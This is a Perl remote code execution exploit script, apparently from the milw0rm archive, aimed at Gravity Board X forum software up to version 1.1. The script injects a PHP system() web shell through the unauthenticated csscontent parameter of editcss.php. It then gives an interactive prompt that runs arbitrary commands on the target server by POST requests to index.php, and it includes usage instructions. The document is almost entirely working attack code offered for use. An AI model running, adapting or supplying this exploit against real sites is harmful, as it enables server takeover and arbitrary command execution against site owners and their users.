Gravity Board X <= 1.1 (csscontent) Remote Code Execution Exploit

#!/usr/bin/perl ## Gravity Board X v1.1 (possibly prior versions) remote code execution exploit ## (c)oded by 1dt.w0lf ## 14.08.2005 ## RST/GHC ## http://rst.void.ru ## http://ghc.ru use LWP::UserAgent; if(@ARGV<1) { &usage; exit(0); } $path = $ARGV[0]; header(); print "Creating shell... Please wait\n"; $gr = LWP::UserAgent->new() or die; $res = $gr->get($path.'editcss.php?csscontent=</style><?php error_reporting(0); system($HTTP_POST_VARS[cmd]); ?>'); if($res->as_string =~ /unable to save changes/) { print "Forum unable to save changes in css template. Exploitation failed.\n"; exit(0); } print "DONE.\n"; while () { print "Type command for execute or 'q' for exit\nGravity# "; while(<STDIN>) { $cmd=$_; chomp($cmd); exit() if ($cmd eq 'q'); last; } &run($cmd); } sub run() { $cmd2 = 'echo 1 && echo _START_ && '; $cmd2 .= $cmd; $cmd2 .= ' && echo _END_'; $gr = LWP::UserAgent->new() or die; $res = $gr->post($path.'index.php',{"cmd" => "$cmd2"}); @result = split(/\n/,$res->content); $runned = 0; $on = 0; print "\n"; for $res(@result) { if ($res =~ /^_END_/) { print "\n"; return 0; } if ($on == 1) { print " $res\n"; } if ($res =~ /^_START_/) { $on = 1; $runned = 1; } } print "Can't execute command\n" if !$runned; } sub header() { print "--* Gravity Board X v1.1 exploit by RST/GHC\n"; print "--* keep it private, not for public\n"; } sub usage() { header(); print "usage : r57Gravity.pl [path_to_forum]\n"; print " e.g.: r57Gravity.pl http://127.0.0.1/forum/\n"; } # milw0rm.com [2006-02-17]